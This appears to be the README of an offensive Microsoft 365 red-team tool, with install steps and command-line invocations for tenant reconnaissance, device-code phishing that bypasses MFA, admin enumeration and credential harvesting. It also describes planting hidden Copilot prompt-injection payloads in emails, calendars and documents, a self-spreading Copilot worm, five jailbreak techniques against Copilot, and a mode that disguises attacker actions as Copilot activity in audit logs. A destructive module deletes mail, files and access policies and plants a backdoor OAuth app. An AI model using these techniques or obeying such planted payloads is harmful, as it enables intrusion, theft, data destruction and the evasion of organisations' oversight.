pip install red-specter-specter-360 # or from source git clone https://github.com/RichardBarron27/red-specter-specter-360 cd red-specter-specter-360 && pip install -e .
SPECTER 360 enforces a 4-tier gate at runtime. Each module requires a minimum gate level.
| Gate | Requirement | ROE Phrase | Unlocks |
|---|---|---|---|
| OPEN | Email address only | — | SURVEY, ACQUIRE, ADMIN-PIPELINE |
| INJECT | Valid access token | — | ESCALATE, MAILPOISON, DOCSTRIKE, TEAMS-SIEGE, GRAPH-HARVEST |
| UNLEASHED | Ed25519 key at ~/.specter/specter360_ed25519.pem | — | COPILOT-HIJACK, GHOST-HAND |
| DESTROY | Ed25519 key + ROE file + --confirm-m365-destruction | m365 destruction authorised | ANNIHILATE |
Extracts maximum intelligence from a single email address without any credentials.
specter-360 --email ceo@corp.com specter-360 --email ceo@corp.com --output json --out-file survey.json
| Output Field | Description |
|---|---|
| tenant_id | Azure AD tenant UUID from OpenID configuration endpoint |
| is_m365 | Boolean — confirmed Microsoft 365 tenant |
| exchange_online | MX record confirms Exchange Online (outlook.com MX) |
| federation_type | managed / federated (ADFS/PingFederate/Okta) |
| mfa_enforced | GetCredentialType MFA policy hint |
| spoofability_score | 0–100: DMARC p=none/missing (+40), SPF ~all (+30), DKIM missing (+30) |
| sharepoint_url | Derived tenant SharePoint root URL |
Identifies likely Global Admin accounts from the domain without any credentials.
specter-360 --email ceo@corp.com --find-admins specter-360 --email ceo@corp.com --find-admins --stealth # jitter + UA rotation
Generates 24 candidate email prefixes (admin@, globaladmin@, ga@, sysadmin@, azuread@, m365admin@, etc.) and validates each via GetCredentialType — IfExistsResult values 1, 5, or 6 confirm a real account. Maximum 8 validation attempts before throttle detection stops the loop. Stealth mode spreads polling over configurable hours with random jitter.
specter-360 --email ceo@corp.com --acquire specter-360 --email ceo@corp.com --find-admins --acquire # target validated admins
RFC 8628 device code flow using a legitimate Microsoft app ID (Teams client by default — blends into normal auth traffic). Generates a user code and verification URL. When the target admin visits microsoft.com/devicelogin and enters the code — from their own trusted device, bypassing MFA and Conditional Access — the token is captured.
specter-360 --email ceo@corp.com --token <tok> --escalate
Enumerates all 7 admin role templates (Global/Exchange/SharePoint/Teams/Application/Cloud Application/Billing Administrator), checks PIM-eligible role activations, scans service principals for admin assignments with exposed credentials, and maps Conditional Access policy exclusions as potential bypass paths.
specter-360 --email ceo@corp.com --token <tok> --mailpoison specter-360 --email ceo@corp.com --token <tok> --mailpoison --attacker-domain attacker.com
Modifies existing email bodies via PATCH /me/messages/{id} to inject Copilot hijack payloads. Three payload modes: html_comment (hidden instruction in HTML comment tag), white_text (1px white font with attacker domain), roleplay_bypass (compliance framing). Creates a fake high-priority calendar event with a poisoned Copilot meeting-prep payload, and patches existing events.
specter-360 --email ceo@corp.com --token <tok> --docstrike specter-360 --email ceo@corp.com --token <tok> --docstrike --no-worm # exfil only
Downloads every .docx/.xlsx/.pptx from OneDrive, injects the Copilot worm payload into the XML comment layer of word/document.xml, and re-uploads. Also uploads a fresh weaponised document named Security-Policy-Update.docx.
The Copilot worm payload instructs Copilot to: (1) identify all users with admin roles in the organisation, (2) send each of them an email with subject "Updated Security Policy — Action Required" attaching the document, (3) create a high-priority calendar event with the doc attached. One infected document — recursive spread to every admin via Copilot's own native send-mail capability.
specter-360 --email ceo@corp.com --token <tok> --copilot
Checks Copilot licence via service plan enumeration. Attempts to extract the tenant-level system prompt via GET /beta/copilot/tenantSettings. Tests 5 safety bypass techniques against the Copilot chat endpoint:
| Technique | Method |
|---|---|
| context_interleave | Embeds instruction in fake prior conversation context claiming COMPLIANCE_MODE=TRUE |
| roleplay | Frames Copilot as ComplianceBot v2.1 operating under GDPR Article 15 |
| base64_wrap | Base64-encodes instruction and claims it is an encoded compliance request |
| authority_spoof | Spoofs MSRC automated audit case with tenant ID and case number |
| chain_of_thought | Step-by-step reasoning chain leading Copilot to fulfill the instruction |
CVE-2024-49035 CVSS 9.6: attempts Copilot Studio management API access with delegated token — if successful, enumerates all deployed Copilot bots and their configurations.
specter-360 --email ceo@corp.com --token <tok> --teams
Enumerates all joined teams and channels. Harvests messages with credential pattern scanning (40+ regex). Injects lure messages into standard channels pointing to microsoft.com/devicelogin. Plants Copilot summary hijack payloads (hidden instruction in 1px white font). Enumerates guest #EXT# accounts for cross-tenant pivot. Maps cross-tenant federation partners via /policies/crossTenantAccessPolicy/partners.
specter-360 --email ceo@corp.com --token <tok> --harvest
Paginates /me/messages, /me/drive/root/children, /me/contacts, /me/joinedTeams. Uses Graph batch requests (up to 20 per batch) to reduce per-request alertable events. Scans email body and file content for credentials. Flags emails matching sensitive keywords (password, token, reset, temporary, invitation). Enumerates admin role members and Conditional Access policies.
GHOST-HAND executes objectives exclusively through Microsoft Copilot's own native Graph API calls. The audit log records only Microsoft.Copilot as the actor. No external tokens appear in activity logs after the trigger is planted. No anomalous API calls from foreign IPs. The attack appears as normal AI behaviour.
specter-360 --email ceo@corp.com --token <tok> --ghost-hand
Uploads IT-Security-Policy-Q4-2026.docx to OneDrive — appears as a legitimate policy document. The XML comment layer contains COPILOT_EXEC_BLOCK instructions. When any user asks Copilot to summarise the document, Copilot executes the standing orders natively.
Optionally overwrites the tenant-level Copilot system prompt (requires admin token) with standing orders that persist across every future Copilot interaction in the tenant. Plants a daily recurring calendar event with a Copilot execution trigger in the meeting notes.
Attribution score (0.0–1.0) is calculated based on: trigger planted (+0.1), system prompt backdoored (+0.2), persistence planted (+0.1), cover-tracks queued (+0.1). Score of 1.0 = only Microsoft.Copilot appears in audit logs.
# Dry run — count targets without deleting specter-360 --email ceo@corp.com --token <tok> --annihilate --simulate # Live execution (DESTROY gate) specter-360 --email ceo@corp.com --token <tok> --annihilate --confirm-m365-destruction
DESTROY gate requires: Ed25519 private key at ~/.specter/specter360_ed25519.pem, ROE file at ~/.specter/specter360_roe.txt containing the phrase "m365 destruction authorised", and the --confirm-m365-destruction flag.
Executes: bulk email deletion via Graph batch DELETE /me/messages, file wipe via DELETE /me/drive/items/{id}, calendar purge, Conditional Access policy deletion (locks out MFA — requires admin token), and registration of a persistent backdoor OAuth app with broad Graph permissions and a 2099 expiry secret.
All reports are identified as S360-{hex12} and signed with Ed25519 (key at ~/.specter/specter360_ed25519.pem). Evidence is SHA-256 hash-chained — each entry includes the hash of the previous entry, producing a tamper-evident chain.
specter-360 --email ceo@corp.com --token <tok> --full --output json --out-file report.json specter-360 --email ceo@corp.com --token <tok> --full --output text
M139 COPILOT GUARD (in development) — detects SURVEY tenant fingerprinting, device code phishing patterns, Copilot prompt injection via document/email, anomalous Graph API batch behaviour, and GHOST-HAND execution signatures in M365 audit logs.